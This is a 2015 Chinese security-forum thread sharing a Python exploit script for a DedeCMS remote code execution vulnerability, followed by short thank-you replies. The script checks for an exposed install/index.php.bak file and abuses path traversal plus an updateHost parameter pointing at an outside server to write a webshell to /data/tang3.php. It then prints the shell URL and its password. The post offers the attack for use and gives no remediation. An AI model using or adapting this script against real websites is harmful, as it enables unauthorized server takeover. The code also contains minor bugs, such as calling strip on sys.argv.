社区首页 › 漏洞情报 › dedecms远程代码执行利用脚本

90_ 发表于 2015-7-23 11:39:12

dedecms远程代码执行利用脚本

转自90sec@Joseph

#! /usr/bin/env python
#coding=utf-8
#Joseph(小续)
 
import requests
import sys
import re
def main():
    try:
        url="http://"+sys.argv.strip('http://')
    except IndexError:
        print '''
        poc: dede.py http://www.baidu.com/
        '''
    payload="/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php"
    urlpoc=url+payload
    code=requests.get(urlpoc).status_code
    if code==200:
        print u"恭喜存在此漏洞"
        print u"Ongoing attacks--->>>>>"
        exploit(url)
        pass
    else:
        print u"sorry 漏洞正在挣扎"
        pass
def exploit(url):
    urlpoc=url+"/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/tang3.php&updateHost=http://www.mrjking.com/"
    htmlcontent=requests.get(urlpoc).content
    Probe=re.compile(r'存在')
    if Probe.findall(htmlcontent):
        print u'''
        ver:getshell成功
        shell:url+/data/tang3.php?a=0  密码为：c
        '''
        pass
    else:
        print u"请看远程地址是否已经不可用"
        pass
if __name__ == '__main__':
    main()

ayang 发表于 2015-7-23 14:29:10

学习学习技术，加油！

ljy07 发表于 2015-7-25 17:01:24

qjf541502724 发表于 2015-7-26 00:42:31

90 大大如果直接就下载了index.php.bak这个文件是不是代表漏洞不存在啊

54hacker 发表于 2015-7-26 08:09:42

支持中国红客联盟(ihonker.org)

Andre 发表于 2015-7-26 12:20:11

感谢分享，收藏！

Sty，涛 发表于 2015-7-26 15:35:27

404网安 发表于 2015-7-26 16:56:55

qjf541502724 发表于 2015-7-26 00:42
90 大大如果直接就下载了index.php.bak这个文件是不是代表漏洞不存在啊

对的                     

菜鸟小羽 发表于 2015-7-26 17:38:38

感谢楼主的分享~

ruguoruo 发表于 2015-7-26 21:45:15

还是不错的哦，顶了

查看完整版本: dedecms远程代码执行利用脚本